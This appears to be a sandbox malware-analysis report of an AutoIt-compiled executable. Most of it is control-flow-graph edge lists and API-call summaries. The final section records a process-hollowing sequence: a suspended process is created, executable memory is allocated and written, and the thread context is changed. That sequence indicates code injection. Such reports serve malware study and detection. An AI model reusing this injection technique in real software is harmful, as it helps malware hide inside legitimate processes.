174fbf 98053->98054 98054->97921 98056 17bdcc 98055->98056 98057 17bdfb 98056->98057 98100 17bf39 39 API calls 98056->98100 
98057->97924 98060 17515b 98059->98060 98061 175179 98059->98061 98062 17503b 98060->98062 98064 17be6d 8 API calls 98060->98064 98063 1784b7 8 API calls 98061->98063 98065 194db8 98062->98065 98063->98062 98064->98062 98066 194e3b 98065->98066 98067 194dc6 98065->98067 98103 194e4d 40 API calls 4 library calls 98066->98103 98074 194deb 98067->98074 98101 19f669 20 API calls __dosmaperr 98067->98101 98070 194e48 98070->97934 98071 194dd2 98102 1a2b7c 26 API calls pre_c_initialization 98071->98102 98073 194ddd 98073->97934 98074->97934 98076 177d59 98075->98076 98077 19016b 8 API calls 98076->98077 98078 177d67 98077->98078 98104 178386 98078->98104 98081 1783b0 98107 17c700 98081->98107 98083 1783c0 98084 19019b 8 API calls 98083->98084 98085 1750d3 98083->98085 98084->98085 98086 178a10 98085->98086 98087 178a26 98086->98087 98088 1b6728 98087->98088 98094 178a30 98087->98094 98120 18b71c 8 API calls 98088->98120 98089 1b6735 98121 17b3fe 98089->98121 98091 178b4b 98091->97975 98094->98089 98094->98091 98095 178b44 98094->98095 98096 19016b 8 API calls 98095->98096 98096->98091 98098 17c269 8 API calls 98097->98098 98099 176287 98098->98099 98099->98037 98100->98057 98101->98071 98102->98073 98103->98070 98105 19016b 8 API calls 98104->98105 98106 1750c5 98105->98106 98106->98081 98108 17c70b 98107->98108 98109 1c1228 98108->98109 98114 17c713 messages 98108->98114 98110 19016b 8 API calls 98109->98110 98111 1c1234 98110->98111 98111->98111 98112 17c71a 98112->98083 98114->98112 98115 17c780 98114->98115 98118 17c78b messages 98115->98118 98116 17c7c6 messages 98116->98114 98118->98116 98119 18e29c 8 API calls messages 98118->98119 98119->98116 98120->98089 98122 17b412 98121->98122 98123 17b40c 98121->98123 98123->98122 98895 194f6b _abort 98894->98895 98896 194f72 98895->98896 98897 194f84 98895->98897 98933 1950b9 GetModuleHandleW 98896->98933 98918 1a32ee EnterCriticalSection 98897->98918 98900 194f77 98900->98897 98934 1950fd GetModuleHandleExW 98900->98934 
98901 195029 98922 195069 98901->98922 98904 194f8b 98904->98901 98906 195000 98904->98906 98919 1a2538 98904->98919 98910 195018 98906->98910 98911 1a27b1 _abort 5 API calls 98906->98911 98908 195072 98942 1b20c9 5 API calls _ValidateLocalCookies 98908->98942 98909 195046 98925 195078 98909->98925 98912 1a27b1 _abort 5 API calls 98910->98912 98911->98910 98912->98901 98918->98904 98943 1a2271 98919->98943 98962 1a3336 LeaveCriticalSection 98922->98962 98924 195042 98924->98908 98924->98909 98963 1a399c 98925->98963 98928 1950a6 98931 1950fd _abort 8 API calls 98928->98931 98929 195086 GetPEB 98929->98928 98930 195096 GetCurrentProcess TerminateProcess 98929->98930 98930->98928 98932 1950ae ExitProcess 98931->98932 98933->98900 98935 19514a 98934->98935 98936 195127 GetProcAddress 98934->98936 98938 195159 98935->98938 98939 195150 FreeLibrary 98935->98939 98937 19513c 98936->98937 98937->98935 98940 190e1c _ValidateLocalCookies 5 API calls 98938->98940 98939->98938 98941 194f83 98940->98941 98941->98897 98946 1a2220 98943->98946 98945 1a2295 98945->98906 98947 1a222c ___scrt_is_nonwritable_in_current_image 98946->98947 98954 1a32ee EnterCriticalSection 98947->98954 98949 1a223a 98955 1a22c1 98949->98955 98953 1a2258 __fread_nolock 98953->98945 98954->98949 98958 1a22e9 98955->98958 98960 1a22e1 98955->98960 98956 190e1c _ValidateLocalCookies 5 API calls 98957 1a2247 98956->98957 98961 1a2265 LeaveCriticalSection _abort 98957->98961 98959 1a2d58 _free 20 API calls 98958->98959 98958->98960 98959->98960 98960->98956 98961->98953 98962->98924 98964 1a39c1 98963->98964 98965 1a39b7 98963->98965 98970 1a3367 5 API calls 2 library calls 98964->98970 98967 190e1c _ValidateLocalCookies 5 API calls 98965->98967 98968 195082 98967->98968 98968->98928 98968->98929 98969 1a39d8 98969->98965 98970->98969 98971 171044 98976 172735 98971->98976 98973 17104a 99012 190433 29 API calls __onexit 98973->99012 98975 171054 99013 1729da 98976->99013 98980 1727ac 98981 17bf07 8 API 
calls 98980->98981 98982 1727b6 98981->98982 98983 17bf07 8 API calls 98982->98983 98984 1727c0 98983->98984 98985 17bf07 8 API calls 98984->98985 98986 1727ca 98985->98986 98987 17bf07 8 API calls 98986->98987 98988 172808 98987->98988 98989 17bf07 8 API calls 98988->98989 98990 1728d4 98989->98990 99023 172d5e 98990->99023 98994 172906 98995 17bf07 8 API calls 98994->98995 98996 172910 98995->98996 99044 1830e0 98996->99044 98998 17293b 99054 1730ed 98998->99054 99000 172957 99001 172967 GetStdHandle 99000->99001 99002 1b39c1 99001->99002 99003 1729bc 99001->99003 99002->99003 99004 1b39ca 99002->99004 99006 1729c9 OleInitialize 99003->99006 99005 19016b 8 API calls 99004->99005 99007 1b39d1 99005->99007 99006->98973 99061 1e09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99007->99061 99009 1b39da 99062 1e1200 CreateThread 99009->99062 99011 1b39e6 CloseHandle 99011->99003 99012->98975 99063 172a33 99013->99063 99016 172a33 8 API calls 99017 172a12 99016->99017 99018 17bf07 8 API calls 99017->99018 99019 172a1e 99018->99019 99020 1784b7 8 API calls 99019->99020 99021 17276b 99020->99021 99022 173205 6 API calls 99021->99022 99022->98980 99024 17bf07 8 API calls 99023->99024 99025 172d6e 99024->99025 99026 17bf07 8 API calls 99025->99026 99027 172d76 99026->99027 99028 17bf07 8 API calls 99027->99028 99029 172d91 99028->99029 99030 19016b 8 API calls 99029->99030 99031 1728de 99030->99031 99032 17318c 99031->99032 99033 17319a 99032->99033 99034 17bf07 8 API calls 99033->99034 99035 1731a5 99034->99035 99036 17bf07 8 API calls 99035->99036 99037 1731b0 99036->99037 99038 17bf07 8 API calls 99037->99038 99039 1731bb 99038->99039 99040 17bf07 8 API calls 99039->99040 99041 1731c6 99040->99041 99042 19016b 8 API calls 99041->99042 99043 1731d8 RegisterWindowMessageW 99042->99043 99043->98994 99045 183121 99044->99045 99051 1830fd 99044->99051 99070 1905d2 5 API calls __Init_thread_wait 99045->99070 
99046 18310e 99046->98998 99049 18312b 99049->99051 99071 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99049->99071 99050 189ec7 99050->99046 99073 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99050->99073 99051->99046 99072 1905d2 5 API calls __Init_thread_wait 99051->99072 99055 1b3c69 99054->99055 99056 1730fd 99054->99056 99074 1e3b63 8 API calls 99055->99074 99057 19016b 8 API calls 99056->99057 99059 173105 99057->99059 99059->99000 99060 1b3c74 99061->99009 99062->99011 99075 1e11e6 14 API calls 99062->99075 99064 17bf07 8 API calls 99063->99064 99065 172a3e 99064->99065 99066 17bf07 8 API calls 99065->99066 99067 172a46 99066->99067 99068 17bf07 8 API calls 99067->99068 99069 172a08 99068->99069 99069->99016 99070->99049 99071->99051 99072->99050 99073->99046 99074->99060 99076 18230c 99077 182315 __fread_nolock 99076->99077 99079 1c7487 99077->99079 99082 182366 99077->99082 99083 19016b 8 API calls 99077->99083 99084 181fa7 __fread_nolock 99077->99084 99087 19019b 8 API calls 99077->99087 99088 178e70 99077->99088 99111 17662b 8 API calls __fread_nolock 99079->99111 99081 1c7493 99081->99084 99086 17be6d 8 API calls 99081->99086 99085 177cb3 8 API calls 99082->99085 99083->99077 99085->99084 99086->99084 99087->99077 99089 178e85 99088->99089 99105 178e82 99088->99105 99090 178e8d 99089->99090 99091 178ebb 99089->99091 99112 195556 26 API calls 99090->99112 99094 178ecd 99091->99094 99101 1b6b10 99091->99101 99103 1b6a29 99091->99103 99113 18fe8f 51 API calls 99094->99113 99095 178e9d 99098 19016b 8 API calls 99095->99098 99096 1b6b28 99096->99096 99100 178ea7 99098->99100 99102 17b25f 8 API calls 99100->99102 99115 195513 26 API calls 99101->99115 99102->99105 99104 19019b 8 API calls 99103->99104 99110 1b6aa2 99103->99110 99106 1b6a72 99104->99106 99105->99077 99107 19016b 8 API calls 99106->99107 99108 1b6a99 99107->99108 99109 17b25f 8 API calls 99108->99109 99109->99110 99114 18fe8f 51 API calls 
99110->99114 99111->99081 99112->99095 99113->99095 99114->99101 99115->99096 100393 1c1a68 100394 1c1a70 100393->100394 100397 17d4e5 100393->100397 100431 1d79af 8 API calls __fread_nolock 100394->100431 100396 1c1a82 100432 1d7928 8 API calls __fread_nolock 100396->100432 100400 19016b 8 API calls 100397->100400 100399 1c1aac 100401 1802f0 230 API calls 100399->100401 100402 17d539 100400->100402 100403 1c1ad3 100401->100403 100423 17c2cd 100402->100423 100405 1c1ae7 100403->100405 100433 1f60a2 53 API calls _wcslen 100403->100433 100408 19016b 8 API calls 100419 17d61e messages 100408->100419 100409 1c1b04 100409->100397 100434 1d79af 8 API calls __fread_nolock 100409->100434 100411 17c34b 8 API calls 100421 17d95c messages 100411->100421 100412 17be6d 8 API calls 100412->100419 100413 17b3fe 8 API calls 100413->100419 100415 1c1f1c 100435 1d55d9 8 API calls messages 100415->100435 100416 1c1f37 100418 17c34b 8 API calls 100418->100419 100419->100412 100419->100413 100419->100415 100419->100416 100419->100418 100420 17d8c1 messages 100419->100420 100420->100411 100420->100421 100422 17d973 100421->100422 100430 18e284 8 API calls messages 100421->100430 100427 17c2dd 100423->100427 100424 17c2e5 100424->100408 100425 19016b 8 API calls 100425->100427 100426 17bf07 8 API calls 100426->100427 100427->100424 100427->100425 100427->100426 100428 17be6d 8 API calls 100427->100428 100429 17c2cd 8 API calls 100427->100429 100428->100427 100429->100427 100430->100421 100431->100396 100432->100399 100433->100409 100434->100409 100435->100416 99116 1a1e4c 99125 1ad1e0 GetEnvironmentStringsW 99116->99125 99119 1a1e64 99121 1a2d58 _free 20 API calls 99119->99121 99122 1a1e99 99121->99122 99123 1a1e6f 99124 1a2d58 _free 20 API calls 99123->99124 99124->99119 99126 1a1e5e 99125->99126 99127 1ad1f4 99125->99127 99126->99119 99132 1a1f70 26 API calls 3 library calls 99126->99132 99133 1a3bb0 99127->99133 99129 1ad208 __fread_nolock 99130 1a2d58 _free 20 API calls 99129->99130 
99131 1ad222 FreeEnvironmentStringsW 99130->99131 99131->99126 99132->99123 99134 1a3bee 99133->99134 99138 1a3bbe pre_c_initialization 99133->99138 99141 19f669 20 API calls __dosmaperr 99134->99141 99136 1a3bd9 RtlAllocateHeap 99137 1a3bec 99136->99137 99136->99138 99137->99129 99138->99134 99138->99136 99140 19523d 7 API calls 2 library calls 99138->99140 99140->99138 99141->99137 99142 19f08e 99143 19f09a ___scrt_is_nonwritable_in_current_image 99142->99143 99144 19f0bb 99143->99144 99145 19f0a6 99143->99145 99155 19951d EnterCriticalSection 99144->99155 99161 19f669 20 API calls __dosmaperr 99145->99161 99148 19f0ab 99162 1a2b7c 26 API calls pre_c_initialization 99148->99162 99149 19f0c7 99156 19f0fb 99149->99156 99154 19f0b6 __fread_nolock 99155->99149 99164 19f126 99156->99164 99158 19f108 99159 19f0d4 99158->99159 99184 19f669 20 API calls __dosmaperr 99158->99184 99163 19f0f1 LeaveCriticalSection __fread_nolock 99159->99163 99161->99148 99162->99154 99163->99154 99165 19f14e 99164->99165 99166 19f134 99164->99166 99168 19dce5 __fread_nolock 26 API calls 99165->99168 99188 19f669 20 API calls __dosmaperr 99166->99188 99170 19f157 99168->99170 99169 19f139 99189 1a2b7c 26 API calls pre_c_initialization 99169->99189 99185 1a9799 99170->99185 99174 19f25b 99176 19f268 99174->99176 99183 19f20e 99174->99183 99175 19f1df 99177 19f1fc 99175->99177 99175->99183 99191 19f669 20 API calls __dosmaperr 99176->99191 99190 19f43f 31 API calls 4 library calls 99177->99190 99180 19f206 99181 19f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 99180->99181 99181->99158 99183->99181 99192 19f2bb 30 API calls 2 library calls 99183->99192 99184->99159 99193 1a9616 99185->99193 99187 19f173 99187->99174 99187->99175 99187->99181 99188->99169 99189->99181 99190->99180 99191->99181 99192->99181 99194 1a9622 ___scrt_is_nonwritable_in_current_image 99193->99194 99195 1a962a 99194->99195 99196 1a9642 99194->99196 99228 19f656 20 API calls __dosmaperr 99195->99228 99198 1a96f6 
99196->99198 99202 1a967a 99196->99202 99233 19f656 20 API calls __dosmaperr 99198->99233 99199 1a962f 99229 19f669 20 API calls __dosmaperr 99199->99229 99218 1a54d7 EnterCriticalSection 99202->99218 99203 1a96fb 99234 19f669 20 API calls __dosmaperr 99203->99234 99206 1a9680 99208 1a96b9 99206->99208 99209 1a96a4 99206->99209 99207 1a9703 99235 1a2b7c 26 API calls pre_c_initialization 99207->99235 99219 1a971b 99208->99219 99230 19f669 20 API calls __dosmaperr 99209->99230 99213 1a96a9 99231 19f656 20 API calls __dosmaperr 99213->99231 99214 1a9637 __fread_nolock 99214->99187 99215 1a96b4 99232 1a96ee LeaveCriticalSection __wsopen_s 99215->99232 99218->99206 99220 1a5754 __wsopen_s 26 API calls 99219->99220 99221 1a972d 99220->99221 99222 1a9746 SetFilePointerEx 99221->99222 99223 1a9735 99221->99223 99224 1a975e GetLastError 99222->99224 99225 1a973a 99222->99225 99236 19f669 20 API calls __dosmaperr 99223->99236 99237 19f633 20 API calls __dosmaperr 99224->99237 99225->99215 99228->99199 99229->99214 99230->99213 99231->99215 99232->99214 99233->99203 99234->99207 99235->99214 99236->99225 99237->99225 100436 180e6f 100437 180e83 100436->100437 100443 1813d5 100436->100443 100438 19016b 8 API calls 100437->100438 100441 180e95 100437->100441 100438->100441 100439 1c55d0 100469 1e1a29 8 API calls 100439->100469 100440 17b3fe 8 API calls 100440->100441 100441->100439 100441->100440 100442 180eee 100441->100442 100445 182ad0 230 API calls 100442->100445 100461 18044d messages 100442->100461 100443->100441 100446 17be6d 8 API calls 100443->100446 100467 180326 messages 100445->100467 100446->100441 100447 1c62cf 100473 1e3ef6 81 API calls __wsopen_s 100447->100473 100448 181e00 40 API calls 100448->100467 100449 181645 100454 17be6d 8 API calls 100449->100454 100449->100461 100450 19016b 8 API calls 100450->100467 100452 1c5c7f 100458 17be6d 8 API calls 100452->100458 100452->100461 100453 1c61fe 100472 1e3ef6 81 API calls __wsopen_s 100453->100472 100454->100461 
100457 181940 230 API calls 100457->100467 100458->100461 100459 17be6d 8 API calls 100459->100467 100460 17bf07 8 API calls 100460->100467 100462 190433 29 API calls pre_c_initialization 100462->100467 100463 1905d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100463->100467 100464 1c60b9 100470 1e3ef6 81 API calls __wsopen_s 100464->100470 100466 180a5e messages 100471 1e3ef6 81 API calls __wsopen_s 100466->100471 100467->100447 100467->100448 100467->100449 100467->100450 100467->100452 100467->100453 100467->100457 100467->100459 100467->100460 100467->100461 100467->100462 100467->100463 100467->100464 100467->100466 100468 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 100467->100468 100468->100467 100469->100461 100470->100466 100471->100461 100472->100461 100473->100461 100474 1815af 100475 18e34f 8 API calls 100474->100475 100476 1815c5 100475->100476 100481 18e3b3 100476->100481 100478 1815ef 100493 1e3ef6 81 API calls __wsopen_s 100478->100493 100480 1c61ab 100482 177a14 8 API calls 100481->100482 100483 18e3ea 100482->100483 100484 18e41b 100483->100484 100485 17b25f 8 API calls 100483->100485 100484->100478 100486 1ce4e4 100485->100486 100487 177af4 8 API calls 100486->100487 100488 1ce4ef 100487->100488 100494 18e73b 39 API calls 100488->100494 100490 1ce502 100491 17b3fe 8 API calls 100490->100491 100492 1ce506 100490->100492 100491->100492 100492->100492 100493->100480 100494->100490 100495 1b27a2 100498 172a52 100495->100498 100499 172a91 mciSendStringW 100498->100499 100500 1b39f4 DestroyWindow 100498->100500 100501 172aad 100499->100501 100502 172d08 100499->100502 100511 1b3a00 100500->100511 100503 172abb 100501->100503 100501->100511 100502->100501 100504 172d17 UnregisterHotKey 100502->100504 100530 172e70 100503->100530 100504->100502 100506 1b3a45 100512 1b3a69 100506->100512 100513 1b3a58 FreeLibrary 100506->100513 100507 1b3a1e 
FindClose 100507->100511 100509 177953 FindCloseChangeNotification 100509->100511 100510 172ad0 100510->100512 100517 172ade 100510->100517 100511->100506 100511->100507 100511->100509 100514 1b3a7d VirtualFree 100512->100514 100519 172b4b 100512->100519 100513->100506 100514->100512 100515 172b3a OleUninitialize 100515->100519 100516 1b3ac5 100522 1b3ad4 messages 100516->100522 100536 1e3c45 6 API calls messages 100516->100536 100517->100515 100519->100516 100520 172b56 100519->100520 100534 172f86 VirtualFreeEx CloseHandle 100520->100534 100526 1b3b63 100522->100526 100537 1d6d63 8 API calls messages 100522->100537 100524 172b7c 100524->100522 100525 172c61 100524->100525 100525->100526 100527 172caf 100525->100527 100526->100526 100527->100526 100535 172eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 100527->100535 100529 172d03 100531 172e7d 100530->100531 100532 172ac2 100531->100532 100538 1d78b9 8 API calls 100531->100538 100532->100506 100532->100510 100534->100524 100535->100529 100536->100516 100537->100522 100538->100531 99238 17f48c 99241 17ca50 99238->99241 99242 17ca6b 99241->99242 99243 1c14af 99242->99243 99244 1c1461 99242->99244 99268 17ca90 99242->99268 99305 1f61ff 230 API calls 2 library calls 99243->99305 99247 1c146b 99244->99247 99250 1c1478 99244->99250 99244->99268 99303 1f6690 230 API calls 99247->99303 99264 17cd60 99250->99264 99304 1f6b2d 230 API calls 2 library calls 99250->99304 99252 18e781 39 API calls 99252->99268 99255 17cf30 39 API calls 99255->99268 99256 1c1742 99256->99256 99259 17cd8e 99260 1c168b 99307 1f6569 81 API calls 99260->99307 99263 17bdc1 39 API calls 99263->99268 99264->99259 99308 1e3ef6 81 API calls __wsopen_s 99264->99308 99267 17b3fe 8 API calls 99267->99268 99268->99252 99268->99255 99268->99259 99268->99260 99268->99263 99268->99264 99268->99267 99270 17be6d 8 API calls 99268->99270 99272 1802f0 99268->99272 99295 18e73b 39 API calls 99268->99295 99296 18aa19 230 API calls 
99268->99296 99297 1905d2 5 API calls __Init_thread_wait 99268->99297 99298 18bbd2 8 API calls 99268->99298 99299 190433 29 API calls __onexit 99268->99299 99300 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99268->99300 99301 18f4ed 81 API calls 99268->99301 99302 18f354 230 API calls 99268->99302 99306 1cff4f 8 API calls 99268->99306 99270->99268 99290 180326 messages 99272->99290 99273 19016b 8 API calls 99273->99290 99274 190433 29 API calls pre_c_initialization 99274->99290 99275 1c62cf 99384 1e3ef6 81 API calls __wsopen_s 99275->99384 99277 181645 99282 17be6d 8 API calls 99277->99282 99289 18044d messages 99277->99289 99279 1c5c7f 99286 17be6d 8 API calls 99279->99286 99279->99289 99280 1c61fe 99383 1e3ef6 81 API calls __wsopen_s 99280->99383 99281 17be6d 8 API calls 99281->99290 99282->99289 99286->99289 99287 1905d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99287->99290 99288 17bf07 8 API calls 99288->99290 99289->99268 99290->99273 99290->99274 99290->99275 99290->99277 99290->99279 99290->99280 99290->99281 99290->99287 99290->99288 99290->99289 99291 1c60b9 99290->99291 99292 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99290->99292 99294 180a5e messages 99290->99294 99309 181940 99290->99309 99371 181e00 99290->99371 99381 1e3ef6 81 API calls __wsopen_s 99291->99381 99292->99290 99382 1e3ef6 81 API calls __wsopen_s 99294->99382 99295->99268 99296->99268 99297->99268 99298->99268 99299->99268 99300->99268 99301->99268 99302->99268 99303->99250 99304->99264 99305->99268 99306->99268 99307->99264 99308->99256 99310 1819de 99309->99310 99311 181966 99309->99311 99314 1c69f1 99310->99314 99327 1819ed 99310->99327 99312 1c6b04 99311->99312 99313 181973 99311->99313 99401 1f84db 230 API calls 2 library calls 99312->99401 99322 1c6b28 99313->99322 99323 18197d 99313->99323 99316 1c69fc 99314->99316 99317 1c6af8 99314->99317 99399 
                                                                                                    Control-flow Graph (continued): the remainder of the preceding function's basic-block edge list (node addresses with API-call counts, e.g. 1f84db 230 API calls, 1e3ef6 81 API calls __wsopen_s); the rendered graph is not reproduced here. Windows API calls named in this edge list: EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, FindCloseChangeNotification, GetFileAttributesW, SetFileAttributesW, lstrlenW, SetFilePointerEx, WriteFile, WritePrivateProfileStringW, GetPrivateProfileStringW, timeGetTime, Sleep, GetCurrentDirectoryW, SetCurrentDirectoryW, GetShortPathNameW, CreateDirectoryW, GetLastError, FindFirstFileW, FindClose, CharLowerBuffW, GetStringTypeW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, GetCurrentProcess, TerminateProcess, FreeLibrary.

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    Control-flow graph for the function at 175d78 (entry block 175d78-175de7), serialized as a basic-block edge list; the rendered graph is not reproduced here. API calls reached from this graph: GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo.
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00175DA7
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    • GetCurrentProcess.KERNEL32(?,0020DC2C,00000000,?,?), ref: 00175ED3
                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00175EDA
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00175F05
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00175F17
                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00175F25
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00175F2C
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00175F51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                    • Opcode ID: a71bd7de9ee500645ecc7a044821f513bc002cb51639dcc3e5d68587b225815f
                                                                                                    • Instruction ID: ac7c0ce2543bc5b7068f8ffe0e209ff8399f76fd82c1713c860a15bb84f73baa
                                                                                                    • Opcode Fuzzy Hash: a71bd7de9ee500645ecc7a044821f513bc002cb51639dcc3e5d68587b225815f
                                                                                                    • Instruction Fuzzy Hash: 92A1733A91A7C0CFC715DFAB7C481A97F75AB27300B84A8D9F48597262C778498CCB25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001732EF,?), ref: 00173342
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001732EF,?), ref: 00173355
                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00242418,00242400,?,?,?,?,?,?,001732EF,?), ref: 001733C1
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                      • Part of subcall function 001741E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001733E9,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00174227
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00000001,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00173442
                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 001B3C8A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 001B3CCB
                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002331F4,00242418,?,?,?,?,?,?,?,001732EF), ref: 001B3D54
                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 001B3D5B
                                                                                                      • Part of subcall function 0017345A: GetSysColorBrush.USER32(0000000F), ref: 00173465
                                                                                                      • Part of subcall function 0017345A: LoadCursorW.USER32(00000000,00007F00), ref: 00173474
                                                                                                      • Part of subcall function 0017345A: LoadIconW.USER32(00000063), ref: 0017348A
                                                                                                      • Part of subcall function 0017345A: LoadIconW.USER32(000000A4), ref: 0017349C
                                                                                                      • Part of subcall function 0017345A: LoadIconW.USER32(000000A2), ref: 001734AE
                                                                                                      • Part of subcall function 0017345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001734C6
                                                                                                      • Part of subcall function 0017345A: RegisterClassExW.USER32(?), ref: 00173517
                                                                                                      • Part of subcall function 0017353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00173568
                                                                                                      • Part of subcall function 0017353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00173589
                                                                                                      • Part of subcall function 0017353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 0017359D
                                                                                                      • Part of subcall function 0017353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 001735A6
                                                                                                      • Part of subcall function 001738F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001739C3
                                                                                                    Strings
                                                                                                    • runas, xrefs: 001B3D4F
                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 001B3C84
                                                                                                    • AutoIt, xrefs: 001B3C7F
                                                                                                    • 0$$, xrefs: 0017341C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                    • String ID: 0$$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                    • API String ID: 683915450-3958038770
                                                                                                    • Opcode ID: 813d14e33b7b1f2ed4e96ea7a4369c99e264e500a1a61c761519d442ccd64684
                                                                                                    • Instruction ID: 424922c2176591745f0ceaa9b60b48b8eb0dac3d2eb8ebdebf2c5bc1524a425b
                                                                                                    • Opcode Fuzzy Hash: 813d14e33b7b1f2ed4e96ea7a4369c99e264e500a1a61c761519d442ccd64684
                                                                                                    • Instruction Fuzzy Hash: 7E51FA31108341EAC719EFA1EC499AE7FB8DFA5704F80846DF499521A2CB708A5DDB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 010DE6E7
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 010DE749
                                                                                                    • WriteProcessMemory.KERNELBASE ref: 010DE797
                                                                                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 010DE87D
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE8D5
                                                                                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE921
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 010DE96C
